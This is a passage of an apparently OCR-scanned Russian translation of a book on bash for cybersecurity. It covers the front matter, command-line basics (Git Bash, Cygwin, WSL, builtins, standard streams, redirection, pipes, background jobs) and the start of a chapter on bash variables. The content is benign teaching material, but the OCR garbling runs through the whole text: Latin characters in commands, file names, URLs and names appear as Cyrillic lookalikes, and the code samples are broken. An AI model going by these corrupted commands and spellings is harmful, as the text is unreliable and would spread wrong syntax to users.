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Карл 


Введение 


В войне самое главное — быстрота: нельзя упускать 
возможности!. 


Сунь-изы. Искусство войны 


В наше время о командной строке часто забывают. Новых специалистов по кибербе- 
зопасности манят инструменты с ярким графическим интерфейсом. Более опытные 
работники или не знают о возможностях командной строки, или недооценивают 
их. При этом командная строка предоставляет множество функций и должна быть 
в наборе инструментальных средств каждого специалиста. К примеру, кажущаяся 
простой команда +аі1, выводящая последние несколько строк конкретного файла, 
состоит более чем из 2000 строк кода на С. Похожий инструмент можно создать с ис- 
пользованием Руоп или другого языка программирования, но зачем, если доступ 
к этим возможностям можно получить, просто введя одно слово в командной строке? 


Вдобавок ко всему, изучив принципы и методы применения командной строки для 
решения сложных задач, вы сможете лучше понять, как функционирует операци- 
онная система. Гуру кибербезопасности понимают не только то, как использовать 
инструменты, но и как они работают на фундаментальном уровне. 


Прочитав эту книгу, вы научитесь грамотно использовать сложные команды пих 
и оболочку Баѕћ, чтобы улучшить свои навыки, необходимые специалистам по 
безопасности. С этими навыками вы сможете быстро создавать и моделировать 
сложные функции с помощью лишь одной строки конвейерных команд. 


Хотя изначально оболочка Баѕћ и команды, которые мы рассмотрим в книге, были 
созданы для семейства операционных систем Ошх и Ппих, теперь они стали уни- 
версальными и их можно применять и в Глпих, и в \/ш4о\$, и в тасО5. 


' Приведенная автором цитата звучит так: Ма 1$ оѓ ће этеабе$ё ипрогбапсе іп маг 1$ 
ехтаогтагу зрее4: опе саппоѓ айога о пеесё оррогіипіу. 


Надежность скриптов 13 


Для кого эта книга 


Книга «Ваѕћ и кибербезопасность» предназначена для тех, кто желает научиться ра- 
ботать с командной строкой в контексте компьютерной безопасности. Наша цель — 
не заменить существующие инструменты скриптами для командной строки, а, ско- 
рее, научить вас эффективно использовать командную строку для улучшения 
существующего функционала. 


На протяжении всей книги мы приводим примеры таких методов безопасности, 
как сбор данных, их анализ и тестирование на проникновение в систему. Цель этих 
примеров — продемонстрировать возможности командной строки и познакомить 
вас с некоторыми фундаментальными методами, используемыми в инструментах 
более высокого уровня. 


Мы предполагаем, что вы уже знакомы с интерфейсом командной строки, знаете 
основы кибербезопасности, программирования и операционных систем Глпих 
и УЛп4о\з. Предварительное знание Баѕћ приветствуется, но не обязательно. 


Эта книга не является введением в программирование, хотя в части І и освещены 
некоторые общие понятия. 


Ваѕћ или Баѕһ 


В книге мы придерживаемся такого правила; если предложение не начинается со 
слова Баѕћ и это слово не относится к программе УЛп4о\уз СЁ Ваѕћ, название обо- 
лочки Баѕћ пишем со строчной буквы 5. Тем самым мы опираемся на руководство от 
Чета Реми (Сћеё Ватеу), который в данный момент поддерживает это программное 
обеспечение. Чтобы больше узнать о Баѕћ, посетите сайт БаѕЬ (ћёр://6і.1у/2107420). 
Чтобы получить информацию о различных релизах Баѕћ, посмотреть справочную 
документацию и примеры, зайдите на страницу НЁр://Ь.1у/2ЕС Ммм. 


Надежность скриптов 


Скрипты, приведенные в книге в качестве примеров, написаны с обучающей целью. 
Они могут быть недостаточно эффективными или надежными для применения 
на промышленном уровне. Будьте осторожны, если решите использовать их в ре- 
альной среде. Убедитесь, что следуете передовым методикам программирования, 
и перед размещением протестируйте скрипты. 
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Рабочая среда 


Для развития навыков в области безопасности, работы с командной строкой 
и БазВ в конце каждой главы вас ждут вопросы и практические задания. Решения 
для некоторых заданий и дополнительные ресурсы можно найти на сайте Һрѕ:// 
млллми.гарАсуБегор$.сот/. 


Условные обозначения 


В книге применяются следующие типографские обозначения. 
Курсив 

Обозначает новые термины и слова, на которых сделан акцент. 
Рубленый шрифт 


Им выделены ОВГ, адреса электронной почты, названия элементов интер- 
фейса. 


Моноширинный шрифт 


Обозначает программные элементы: названия команд переменных или функ- 
ций, типы данных, операторы и ключевые слова. Им также выделены имена 
и расширения файлов, названия папок. 


Этот элемент обозначает совет, подсказку или предложение. 


Такой элемент обозначает примечание. 


Данный элемент обозначает предупреждение. 
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Использование примеров кода 


Эта книга призвана помочь вам в работе. Примеры кода из нее вы можете исполь- 
зовать в своих программах и документации. Если объем кода несущественный, 
связываться с нами для получения разрешения не нужно. Например, для написания 
программы, использующей несколько фрагментов кода из этой книги, разрешения 
не требуется. А вот для продажи или распространения компакт-диска с примерами 
из книг издательства О’КеШу нужно получить разрешение. Ответы на вопросы 
с использованием цитат из этой книги и примеров кода разрешения не требуют. 
Но для включения объемных примеров кода из этой книги в документацию по 
вашему программному продукту разрешение понадобится. 


Мы приветствуем указание ссылки на источник, но не делаем это обязательным тре- 
бованием. Такая ссылка обычно включает имя автора, название книги, название из- 
дательства и 15ВМ№. Например: «Тронкон П., Олбинг К. Ваѕћ и кибербезопасность: атака, 
защита и анализ из командной строки пих. — СПб.: Питер, 2019. 978-5-4461-1514-3». 


Если вам покажется, что использование кода примеров выходит за рамки оговорен- 
ных выше условий и разрешений, свяжитесь с нами по адресу регтіѕѕіопѕ@огеіу.сот. 


Благодарности 


Мы хотели бы поблагодарить основных научных редакторов за их знания и по- 
мощь в уточнении информации, содержащейся в данной книге. Тони Ли (Топу 
Тее), главный технический директор Су[апсе Ірс., — энтузиаст в области безопас- 
ности. Тони регулярно делится своими знаниями на ТликеТа (Н&р://Ь&лу/2НУСИм) 
и ЅесигієуЅупарѕе (ћір://ЫІу/2РЕмҮКка). Чет Реми (СБеё Ватеу), Ѕепіог Тесһпоіову 
Атсһісесё на факультете информационных технологий Университета Кейс Вестерн 
Резерв (Сазе Меѕїегп Кеѕегуе Опіуегѕісу) (Һр://Ы1у/2н2Наб\уү), в данный момент 
является специалистом по сопровождению ПО в Баѕћ. 


Мы также благодарим Билла Купера (ВШ Соорег), Джосайю Дикстра (Јоѕіаћ 
Юукѕіга), Рика Мессиера (Віс Меѕѕіег), Кэмерона Ньюхема (Сатегоп Меућат), 
Сандру Скьяво (Ѕапага Ѕсһіауо) и Дж. П. Воссена (ЈР Уоѕѕеп) за советы и крити- 
ческие замечания. 


И наконец, мы хотели бы поблагодарить всю команду О’'Кеіу, в частности Нан Бар- 
бер (Мап ВагБег), Джона Девинса (Јоһһ Юеүірѕ), Майка Лукидеса (МіКке Гоџкійеѕ), 
Шерон Уилки (Ѕһагоп \/ИКеу), Эллен Траутмэн-Зейг (ЕПеп Тгоџітап-7аіе), 
Кристину Эдвардс (Сһгіѕйпа Ейуагіѕ) и Вирджинию Уилсон (Уігеіпіа \/Цвоп). 


От издательства 


Ваши замечания, предложения, вопросы отправляйте по адресу сотр@рЁег.сот 
(издательство «Питер», компьютерная редакция). 


Мы будем рады узнать ваше мнение! 


На веб-сайте издательства ммм.ріїегсот вы найдете подробную информацию о на- 
ших книгах. 


Часть І 
Основы 


Дайте мне шесть часов на то, чтобы срубить 
дерево, и первые четыре я буду точить 
топор. 


Автор неизвестен 


В части І мы начнем с азов работы с командной строкой, обо- 
лочкой Баѕћ и регулярными выражениями, а также рассмотрим 
фундаментальные принципы кибербезопасности. 


Работа с командной 
строкой 


Интерфейс командной строки компьютера предоставляет вам тесную связь с опе- 
рационной системой (ОС). Командная строка содержит огромное количество 
функций, отточенных и отшлифованных за десятилетия использования. К со- 
жалению, способность взаимодействовать с ОС с помощью командной строки 
стремительно утрачивается — все чаще применяют графические пользовательские 
интерфейсы (2тар1са| иѕег іпегѓасеѕ, СОТ), которые за счет скорости и гибкости 
зачастую облегчают работу, но не дают возможности пользователю задействовать 
скрытые функции. 


Умение эффективно работать с командной строкой — важнейший навык для специа- 
листов по безопасности и администрированию. Он важен для работы со многими 
инструментами в этой сфере, такими как Меазр|оц, М№тар и Ѕпогё. Во время тести- 
рования на возможность проникновения в систему при взаимодействии с целевой 
ОС вашим единственным вариантом может оказаться использование интерфейса 
командной строки, в особенности на ранних стадиях вторжения. 


Чтобы создать прочный «фундамент», мы начнем с общей информации о команд- 
ной строке и ее составляющих, а затем посмотрим, как ею можно воспользоваться 
для улучшения характеристик кибербезопасности. 


Определение командной строки 


В этой книге термином «командная строка» мы будем обозначать специальную 
программу, назначение которой — управление операционной системой с помо- 
щью текстовых команд, вводимых в окне приложения (интерфейсе командной 
строки) без применения графического пользовательского интерфейса (СОТ) 
и встроенных вкладок. Интерфейс командной строки дает возможность написа- 
ния скриптов (сценариев, ѕсгірі). 
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Чтобы эффективно использовать командную строку, вам нужно понимать особен- 
ности и варианты существующих команд, а также уметь с помощью языка сцена- 
риев упорядочить эти команды вместе. 


В книге мы познакомим вас более чем с 40 командами, работающими как в ОС пих, 
так и в \/ш4о\, а также с различными встроенными функциями и ключевыми сло- 
вами оболочки. Большая часть команд появилась в среде Глпих, но, как вы увидите 
далее, существует множество способов запустить их и на базе іпаоуѕ. 


Почему именно Баѕћ 


Для создания скриптов мы выбрали оболочку БаѕћЬ и язык команд. Оболочка Баѕћ 
существует уже несколько десятилетий, доступна почти в каждой версии Гпих 
и даже появилась в №іпаоуѕ. Таким образом, оболочка Баз стала идеальным 
инструментом для операций по обеспечению безопасности, поскольку у нее меж- 
платформенные методы и сценарии. Распространенность Баѕћ также дает опре- 
деленное преимущество специалистам, тестирующим на устойчивость к атакам 
и вторжениям, поскольку во многих случаях им не нужно устанавливать в системе 
дополнительную инфраструктуру поддержки или интерпретатор. 


Примеры использования командной строки 


В книге часто приводятся примеры использования командной строки. Примеры 
однострочных команд будут выглядеть следующим образом: 


1$ -1 


Если в примере с однострочной командой показывается также и результат, он будет 
выглядеть так: 


$ 15 -1 


-ги-ги-г-- 1 дауе дауе 15 Јип 29 13:49 ҺаѕһҒі1еа.х+і 
-Ггихги-г-- 1 аауе даме 627 Јип 29 13:50 һаѕһѕеагсһ.ѕһ 


Обратите внимание: в примере с результатом присутствует символ $. Символ $, ко- 
торый вы видите в начале команды, не является частью этой команды, а показывает 
простой фрагмент командной строки оболочки. Это позволит вам различать команду 
(в том виде, в каком ее надо ввести) и ее результат в терминале. Пустая строка, отделя- 
ющая в примерах команду от результата, при реальном запуске команды появляться 
не будет. Опять-таки она нужна для разделения команды и ее результата. 
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Примеры команд в \/п4о\з, если на это нет особых указаний, запускаются с по- 
мощью Сіє ВазВ, а не из командной строки \/шао\5. 


Запуск пих и Баѕћ в Міпаомѕ 


Оболочка Баѕћ и обсуждаемые нами команды практически во всех дистрибутивах 
Глпих установлены по умолчанию, чего нельзя сказать о \Лш4о\уз. Но, к счастью, 
в \!ш4о\з существует множество способов запуска Глпих-команд и скриптов для 
Баѕћ. Здесь мы опишем четыре варианта: Сі Ваѕћ, Суз\ут, подсистему \/п4о\$ 
для Ііпих (%іпаоуѕ бизузет юг Глпих, №51), командную строку №Міріоуѕ и ин- 
струмент написания скриптов. 


СЕ Ваѕћ 


Многие стандартные команды 1іпих и оболочку Баз можно запустить в \п4о\\, 
если установить Сі, где есть порт Баѕћ. Благодаря тому что Сй Вазй популярен 
и способен выполнять как стандартные команды Глпих и разв, так и многие 
команды самой \/тао\, это наиболее предпочтительный способ выполнения 
приведенных в книге примеров. 


Сіє можно загрузить с сайта И рз://9-5ст.сот/. После того как Сії будет загружен, 
для его запуска достаточно щелкнуть правой кнопкой мыши на Рабочем столе и вы- 
брать в появившемся контекстном меню команду СЁ Ваѕћ Неге (Установить Сі 
Ваз). 


Судуип 


Сувмт — это полноценный эмулятор іпих, предоставляющий также возмож- 
ность установить различные дополнения. Он похож на СЁ Ваѕћ тем, что, помимо 
стандартных команд Гіпих, позволяет запускать многие команды самой Ұіпіо%ѕ. 
Суруіп можно загрузить с сайта Һірѕ://мм.судуіп.соту/. 


Подсистема \М\іпаоуѕ для Шпих 


В У\шао\ 10, если в ней установлена подсистема Міпаооѕ для Гапих (%У 51), 
предумотрен встроенный способ запуска Піпих (а следовательно, и Баѕћ). Чтобы 
установить \№У$І., выполните следующие действия. 
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1. Щелкните на поисковой строке \УЛт4о\ 10. 


2. Введите поисковый запрос Сопго! Рапе! (Панель управления) и откройте одно- 
именную панель. 


3. Щелкните на строке Ргодгатѕ апа Ғеаќигеѕ (Программы и компоненты). 


4. В левой части открывшегося окна щелкните на строке Тит \Міпаоуѕ геаигез оп ог 
ой (Включение и выключение компонентов Ұіпіо%ѕ). 


Установите флажок \ММіпаомѕ ЅиБѕуѕіет Гог Ипих (Подсистема \УіпӢоуѕ для Піпих). 
6. Перезагрузите систему. 


После перезагрузки откройте \Міпаомѕ Ѕїоге (Хранилище ҰУіпаоуѕ) и введите по- 
исковый запрос Ппих. Вы увидите список доступных к установке приложений. 


Найдите и установите ОБапёи. 


9. После установки ОБипа откройте командную строку \/т4о\, введите ибип®и 
и нажмите клавишу Ещег. 


Заметьте, что при подобном использовании дистрибутива \/ЪТ. Глпах вы можете 
выполнять сценарии Баз и подключать файловую систему \/тао\\з, но не можете, 
как в Сі Ваѕћ и Сувуіп, выполнять вызовы системных функций к командам самой 
Уіпаох. 


Установив \№5| и зайдя в М/іпаомѕ Ѕіоге, помимо УБипи, вы можете выбрать 
и другие версии Шпих, например Кай. 


Командная строка и инструмент создания 
скриптов Міпаоуѕ 


Установив подсистему М№іпаоуѕ для пих, с помощью команды Баз! -с вы можете 
выполнять команды Глпах и сценарии Баѕћ напрямую из командной строки и с ис- 
пользованием инструмента создания скриптов \/т4о\у5. 


Например, можно выполнить Г4пих-команду риа из командной строки \/т4о\$ 
по отношению к открытому в данный момент каталогу: 


С: \Оѕегѕ\Раџ1\0реѕкёор>баѕћ -с "рма" 


/тпё/с/Оѕегѕ/Раџ1/реѕкёор 
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Если у вас в виде части \/$Т. установлено несколько дистрибутивов Глпих, при 
запуске команды вместо слова Ба$Н вы можете использовать название дистри- 
бутива: 


С: \Оѕегѕ\Раи1\реѕкёор>ибипи -с "рма" 


/мпе/с/Оѕегѕ /Раџ1/реѕкор 


Этим методом также можно воспользоваться для выполнения пакетов, установлен- 
ных в вашем дистрибутиве Глпих из Ұ$І., если у него есть интерфейс командной 
строки, например пакета Мтар. 


Это дополнение, кажущееся несущественным, предоставляет вам возможность 
с помощью командной строки \/т40\$ и инструментов создания сценариев ис- 
пользовать целый арсенал Глпих-команд, пакетов и функций Баѕћ. 


Основы работы 
с командной строкой 


«Командная строка» — это общий термин, относящийся к средствам, передающим 
команды в интерактивную систему компьютера. Командная строка появилась 
с первыми операционными системами, и ею пользовались, пока не был создан СОТ. 
В системах Глпах это инструмент ввода в оболочку Баѕћ (или другую). Одна из 
базовых операций БазВ — исполнение команды, то есть запуск связанной с этой 
командой программы. Когда вы ввели несколько слов в командную строку, Баѕћ 
предполагает, что первое слово — это название программы, которую нужно запу- 
стить, а остальные слова — аргументы команды. Например, чтобы БаѕЬ запустила 
команду под названием шка1г и передала ей два аргумента, -ри /ётр/ѕсгаёсһ/ 
БагЬ1е, нужно ввести следующее: 


шка1г -р /тр/ѕсгаёсһ/вағЬ1е 


По умолчанию опции программ обычно расположены в начале команды, после 
названия запускаемого ею приложения, и начинаются с дефиса (-). В нашем 
примере дефис установлен перед опцией -р (заметьте, между дефисом и буквой 
пробела быть не должно!). Эта конкретная команда (тка1г) дает указание создать 
каталог с названием /%тр/зсгафсп/5агЪЬТе, где каталог 5агЬ1е вложен в каталог 
/зсгафсй, который, в свою очередь, вложен в каталог /ётр. Опция -р обозначает 
определенное поведение, которое выбирает пользователь: в частности, отсутствие 
отчетов об ошибках и при необходимости создание (или попытку создания) любых 
промежуточных каталогов (так как если в команде указан только каталог /&тр, 
то тКа1г сначала создаст каталог /тр/ѕсгаёсћ, а потом попытается создать /4тр/ 
<сгаесп/ваг1е). 
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Команды, аргументы, встроенные функции 
и ключевые слова 


Команды, которые вы можете запустить, определяют либо файлы, либо встроенные 
функции, либо ключевые слова. 


Файлы — это исполняемые приложения, которые становятся результатом компи- 
ляции и теперь состоят из машинных команд. Примером подобного приложения 
служит программа 15. В большинстве файловых систем Глпих этот файл находится 
в каталоге /61п/1$. 


Другой тип файла — это скрипт. Это текстовый файл, который может прочесть 
человек. Скрипт пишется на одном из языков, поддерживаемых вашей системой, 
с помощью интерпретатора (программы) для этого языка. Примерами языков для 
написания скриптов могут служить Баз, РуВоп и Рег|. В следующих главах мы 
создадим несколько скриптов (написанных на Баѕћ). 


Встроенные функции — это часть оболочки. Они выглядят как исполняемые 
файлы, но в файловой системе нет файла, который загружается для исполнения 
того, что делают встроенные функции. Вместо этого работа выполняется внутри 
оболочки. Примером встроенной функции служит команда рма. Применение таких 
функций позволит добиться результатов быстрее и с большей продуктивностью. 
Как пользователь, вы можете определять наиболее часто используемые функции 
оболочки как встроенные команды. 


Существуют и другие слова, которые выглядят как команды, но на самом деле 
являются частью языка оболочки, например 1+. Это слово часто используется 
в качестве первого слова в командной строке, но это не команда. Это ключевое 
слово. Оно связано с синтаксисом, который может быть сложнее, чем обычный 
формат командной строки: команда -опции аргументы. Многие ключевые слова мы 
рассмотрим в следующей главе. 


Вы можете использовать команду +уре, чтобы определить, чем является конкретное 
слово — ключевым словом, встроенной функцией, командой или ничем из пере- 
численного. Если добавить опцию -+, то можно свести результат к одному слову: 


$ фуре -+ 1+ 

Ккеумога 

$ Туре -+ рма 
риі1+іп 

$ уре -+ 15 


Ғі1е 
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Можно использовать команду сотрвеп, чтобы определить, какие команды, встроенные 
функции и ключевые слова вам доступны. Чтобы увидеть список команд, добавьте 
опцию -с, список встроенных функций — -Ь, перечень ключевых слов — -К: 


$ сотрвеп -К 


1+ 

ёһеп 
е1ѕе 
е11+ 


Если поначалу вы будете путаться в этих понятиях, не волнуйтесь. Не всегда нужно 
понимать разницу, но стоит знать о том, что использование встроенных функций 
и ключевых слов гораздо эффективнее, чем выполнение команд (исполняемых во 
внешних файлах), особенно если их зациклить и вызывать много раз подряд. 


Стандартные ввод/вывод/ошибка 


На жаргоне специалистов по операционным системам запущенная программа на- 
зывается процессом. Каждый процесс в среде Опіх/Ппих/РОЅІХ (и, следовательно, 
в Міпаоуѕ) обладает тремя различными файловыми дескрипторами. Дескрипторам 
присвоены следующие названия: стандартный ввод (сокращенно $ їп), стандарт- 
ный вывод ($40) и стандартная ошибка (5 йет). 


Как можно догадаться по названию, $ т — это ресурс ввода в программу по умол- 
чанию. Обычно это символы, поступающие при вводе с клавиатуры. Когда ваш 
скрипт читает из $411, он читает символы, набранные на клавиатуре, или (как вы 
вскоре увидите) его можно изменить таким образом, что он будет читать из файла. 
$401 — это место, куда по умолчанию отправляется результат, выданный про- 
граммой. По умолчанию результат появляется в окне, в котором запущены ваши 
оболочка или сценарий оболочки. Стандартная ошибка тоже может быть резуль- 
татом, отправленным программой. Но в $&4егг пишутся (или должны писаться) 
сообщения об ошибках. Программист решает, отправить результат в $401 или 
з(4етг. Поэтому стоит писать сценарии аккуратно, чтобы они отправляли отчеты 
об ошибках в $ 4егг, а не в $6401. 


Перенаправление и конвейер 


Одной из главнейших инноваций оболочки было то, что она предоставила нам ме- 
ханизм, с помощью которого можно было взять запущенную программу и поменять 
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место ввода и/или вывода, не изменяя саму программу. Если у вас есть программа 
под названием һапдумогк, читающая ввод из $4 и записывающая результаты 
в $ Чо, вы легко можете это изменить: 


КВапаумогК < дафа.1п > геѕи1&5.ои 


Так, папаумогК запустится, но ее ввод будет поступать не с клавиатуры, а из файла 
под названием ааќа. іп (если такой файл существует и в нем есть информация 
в нужном формате). А результат будет отправляться не на экран, а в файл под 
названием гези1+$ .оц* (если его не существует, он будет создан, а если существу- 
ет — переписан). Эта техника называется перенаправлением, потому что мы пере- 
направляем ввод из другого места и вывод не на экран. 


А что делать с $&4егг? Синтаксис в данном случае схож. При перенаправлении 
данных, выводимых программой, нужно различать $406 и $ 4егг, и мы создаем 
это различие с помощью номеров файловых дескрипторов. 541 — это файловый 
дескриптор 0, ѕ6йоиё — файловый дескриптор 1, а $4егг — файловый дескриптор 2. 
Таким образом, мы можем перенаправить сообщения об ошибках: 


һапаумогк 2> егг.т$55 


Здесь мы перенаправляем только ѕійетг, и любое сообщение об ошибке будет от- 
правлено в файл, который мы назвали егп.тѕе5. 


Разумеется, мы можем выполнить все три действия одной строкой кода: 


һапаумогк < Чафа.1п > геѕи1+5.оиї 2> егг.т$8$ 


Иногда нужно, чтобы сообщения об ошибках были объединены с нормальными 
результатами (как это происходит по умолчанию, когда и то и другое выводится 
на экране). Это можно сделать так: 


һапаумогк < Чафа.1п > гези1%$.оие 2>&1 


Данное действие заставляет отправлять ѕійегт (2) в то же место, что и файловый 
дескриптор 1 (&1). Отметьте, что, если не будет значка амперсанда (&), сообще- 
ния об ошибках будут просто отправляться в файл с названием 1. Такое соче- 
тание $64016 и $6 4егг так распространено, что существует удобная сокращенная 
нотация: 


һапаумогк < Чафа.1п &> гези1*$.оиЕ 


Если вы хотите отсеять стандартный вывод, можете перенаправить его в специ- 
альный файл под названием /аеу/пи11: 


КВапаумогКкК < Чафа.1п > /4еу/пи11 
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Чтобы видеть результаты в командной строке и одновременно перенаправ- 
лять их в файл, используйте команду +ее. Следующий пример выводит резуль- 
таты выполнения команды һапӣумоғгк на экран и в то же время сохраняет их 
в файл геѕи1+5.0иї: 


һапдумогк < дафа.1п | +ее геѕи1+5.оиЁ 


Используйте опцию -а команды ее, чтобы добавлять результаты в файл, а не 
переписывать его заново. Символ | известен как «пайп» (ріре). Указав его, можно 
использовать результаты одной команды в качестве исходных данных для другой. 
В данном примере результаты выполнения һапаумогк передаются команде ее для 
дальнейшей обработки. 


При перенаправлении результата с использованием символа > файл будет создан 
или обрезан (то есть из файла будет удалено содержимое). Если вы хотите заранее 
сохранить имеющееся содержимое данного файла, вам следует его дополнить, ис- 
пользуя символ >>, как показано ниже: 


һапдӢумогк < Чафа.1п >> ғеѕи1+5.оиї 


Таким образом, выполняется һапдумогк, а затем любой результат из $406 до- 
бавляется в файл геѕи1+5.ои+, а не перезаписывается поверх существующего 
содержимого. 


Следующая строка: 


һапдӢумогк < Чафа.1п &>> гез$и1{$.оц{ 


позволяет выполнить һапдумогк, а затем добавить и $4ои%, и з4егг в файл геѕи165 .ои&, 
не перезаписывая поверх существующего содержимого. 


Выполнение команд в фоновом режиме 


На протяжении этой книги мы выйдем за рамки однострочных команд и начнем 
создавать сложные сценарии. Некоторые из них могут выполняться в течение 
довольно длительного времени, и вы, возможно, не захотите долго ждать. Вместо 
этого вы можете запустить любую команду или сценарий в фоновом режиме, ис- 
пользуя оператор & Скрипт будет выполняться дальше, но вы сможете продолжать 
использовать оболочку, давая другие команды и/или выполняя другие сценарии. 
Например, чтобы запустить р1пё в фоновом режиме и перенаправить стандартный 
вывод в файл, используйте эту команду: 


ріп 192.168.10.56 > ріпр.1ор & 
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Вы можете перенаправить стандартный вывод и/или стандартные ошибки в файл, 
отправив задание в фоновый режим, иначе задание продолжит выводиться на экран 
и будет прерывать другие ваши действия: 


ріпа 192.168.10.56 &> ріпр.1ор & 


Осторожно: не перепутайте символ & (для отправки задания в фоновый режим) 
и &> (для совместного перенаправления стандартного вывода и стандартных 
ошибок). 


Для получения списка задач, которые сейчас выполняются в фоновом режиме, 
можно использовать команду 30$: 


$ јорѕ 
[1]+ Киппіпе р1пё 192.168.10.56 > р1пё.105 & 


Введите команду +в и соответствующий номер задания, чтобы снова вывести задачу 
в приоритет из фонового режима: 


$ +1 
ріпа 192.168.10.56 > р1тё.1о05 


Если ваша задача сейчас выполняется в приоритетном режиме, для приостановки 
процесса можно нажать сочетание клавиш Сі1+2. Для продолжения работы в фо- 
новом режиме введите команду бе. После этого вы можете использовать команды 
јобѕ и ЕЕ, как описано ранее. 


От командной строки до скрипта 


Скрипт оболочки — это просто файл, содержащий команды, которые вы можете 
последовательно ввести в командную строку. Если ввести одну команду или более 
в файл, получится скрипт оболочки. Если вы, например, назовете этот файл тузсг1рх, 
его можно будет запустить, введя команду баѕћ тузсг1 ре. Кроме того, можете наде- 
лить его полномочиями на выполнение (например, сптод 755 туѕспірё), а затем, чтобы 
управлять сценарием, вызывать его напрямую: . /туѕсгірё. Следующая строка, 
сообщающая операционной системе, какой язык скриптов мы используем, часто 
становится первой строкой скрипта: 


#!/61п/Ба$й - 
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Конечно, в этой строке предполагается, что БазЬ находится в каталоге /Ьіп. 
Если вам потребуется сделать скрипт более мобильным, можно воспользоваться 
следующим подходом: 


#!/ч$г/61п/епу Баѕћ 


Здесь, чтобы найти местонахождение Баз, используется команда епу. Этот способ 
считается стандартным методом решения проблемы мобильности. Однако в данном 
случае предполагается, что команду епу можно найти в каталоге /чзг/Ь1п. 


Выводы 


Командная строка — это виртуальный аналог универсального инструмента. Если вам 
нужно завинтить шуруп в деревянный брусок, лучше всего взять для этого специ- 
альный инструмент, например ручную или электрическую отвертку. Но если вы 
заблудились в лесу и ваши ресурсы ограниченны, нет ничего лучше универсального 
инструмента. С ним вы можете завинтить шуруп, разрезать веревку и даже открыть 
бутылку. То же самое можно сказать и о командной строке: она ценна не уровнем 
выполнения одного конкретного задания, а своей гибкостью и доступностью. 


В последние годы оболочка Баѕћ и команды пих стали общедоступными. С по- 
мощью Сі Ваѕћ или Сувуір вы с легкостью можете получить доступ к функционалу 
из Міпаоуѕ. Для получения большего количества функций можно установить под- 
систему \/т4о\$ для Гапих, которая даст вам возможность запускать полные версии 
операционных систем Гіпих и пользоваться их функциями напрямую из командной 
строки и с помощью инструмента Ро\уег Бе для создания скриптов \/ 140%. 


В следующей главе мы обсудим пользу скриптов, проявляющуюся благодаря 
возможности запускать команды повторно, принимать решения и зацикливать 
различные исходные данные. 


Упражнения 
1. Напишите команду, которая выполняет 14 соп+1в и перенаправляет стандартный 
вывод В файл ірайӣгеѕѕ. хі. 


2. Напишите команду, которая выполняет 1#соп+1е, перенаправляет стандартный 
вывод и дополняет им файл ірааагеѕѕ.1х+. 


3. Напишите команду, которая копирует все файлы из каталога /еїс/а в каталог 
/еёс/Ы и перенаправляет стандартные ошибки в файл соруеггог. 108. 
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4. Напишите команду, которая создает список каталогов (1$), находящихся в кор- 
невом каталоге, и направляет вывод в команду тоге. 


5. Напишите команду, которая исполняет муфа$К. ѕһћ и отправляет его в фоновый 
режим. 


6. Основываясь на следующем списке заданий, напишите команду, которая выво- 
дит задание по пингу Атагоп в приоритет: 


[1] Киппіпе ріпе ммм. соов1е.сот > /4еу/пи11 & 
[2]- Киппіпе ріпе ммм. атагоп.сот > /Чеу/пи11 & 
[3]+ Киппіпе ріпа ммм. огеі11у.сот > /Яеу/пи11 & 


Чтобы просмотреть дополнительные ресурсы и получить ответы на эти вопросы, 
зайдите на сайт ћірѕ://Лумм.гарійсубегорѕ.соту/. 


Основы работы 
с Бай 


Ваз — это больше чем просто интерфейс командной строки для запуска программ. 
Это сам по себе язык программирования. По умолчанию он запускает другие про- 
граммы. Как мы уже говорили ранее, когда несколько слов введены в командную 
строку, Баѕћ предполагает, что первое слово — это имя программы, которую нужно 
запустить, а остальные слова — аргументы, которые нужно передать этой программе. 


Но, как язык программирования Баѕћ, также имеет функции для поддержки ввода 
и вывода и управления структурами: 1+, ий11е, Рог, сазе и др. Его основной тип 
данных — строки (например, имена файлов и пути), но он поддерживает и целые 
числа. Поскольку основное внимание уделяется сценариям и запуску программ, 
а не вычислениям, Баѕћ не поддерживает напрямую числа с плавающей точкой. 
Для этого можно использовать другие команды. Далее мы приводим краткий обзор 
отдельных функций, которые делают Баз мощным языком программирования, 
особенно при написании сценариев. 


Вывод 


Как и любой другой язык программирования, Баѕћ имеет возможность выводить 
информацию на экран. Вывод можно успешно выполнить с помощью команды есћо: 


$ есһо "Не11о Мог1а" 


Не11о Мог1а 


Вы также можете использовать встроенную команду ргіпё+, которая позволяет 
добавить дополнительное форматирование: 


$ ргапЕф "Не11о Мог1а\п" 


Не11о Мог1а 
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Вы уже видели в предыдущей главе, как перенаправить этот вывод в файлы, 
ѕсаетт либо другую команду. Больше этих команд и их опций мы рассмотрим 
далее. 


Переменные 


Переменные Баз начинаются с буквенного символа или символа подчеркивания, 
за которым следуют алфавитно-цифровые символы. Они являются строковыми, 
если не указано иное. Чтобы присвоить значение переменной, вы пишете что-то 
вроде этого: 


МУ\/АВ=+ех{Фогауа1ие 


Чтобы извлечь значение этой переменной (например, вывести на экран с помощью 
команды еспо), вы задаете $ перед именем переменной: 


есһо $МУ\УАВ 


Если вы хотите присвоить переменной последовательность слов, то есть сохранить 
все пробелы, то заключите значение в кавычки, как показано ниже: 


МУ\/АВ= 'Пеге 1$ а 1опзег ѕеї оф могаѕ' 
ОТНКМ="еіёһег дочБ1е ог ѕіпр1е диоёеѕ м111 могКк" 


Использование двойных кавычек позволит выполнять другие замены внутри 
строки. Например: 


Ғігѕёуаг=реріппіпе 


ѕесопауг="һіѕ 15 јиѕі һе $+1г$%\уаг" 
есһо $зесопамг 


В результате мы получаем на выходе такое значение переменной +1г$%\аг: 
{115 15 јиѕі {Пе беріппіпе 


При извлечении значения переменной вы можете выполнить множество под- 
становок. Мы покажем эти подстановки так, как они будут использованы в по- 
следующих сценариях. 


Помните, что при использовании двойных кавычек (") любые замены, начина- 
ющиеся с $, все равно выполняются, а если значение находится внутри одинарных 
кавычек ("), никаких замен не будет. 
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Вы также можете сохранить вывод, полученный командой оболочки, с помощью 
символов $( ), как показано ниже: 


СМОО0Т=$ (риа) 


Здесь команда рма выполняется в подоболочке, и вместо того, чтобы печатать 
результат в $64оиф, мы сохраняем вывод команды в переменной смобот. Вы также 
можете передать вместе несколько команд внутри $( ). 


Позиционные параметры. Обычно при использовании инструментов командной 
строки для передачи данных в команды применяются аргументы или параметры. 
Каждый параметр отделяется пробелом и доступен внутри Баѕћ с помощью спе- 
циального набора идентификаторов. В скрипте Баѕћ доступ к первому параметру, 
переданному в скрипт, можно получить с помощью $1, ко второму — с $2 ит. д. 
$0 — это специальный параметр, который содержит имя скрипта, а $# возвращает 
общее количество параметров. Взгляните на скрипт в примере 2.1. 


Пример 2.1. есһорагатѕ.5һ 


#1!/61п/Ба$й - 

# 

Вай и кибербезопасность 
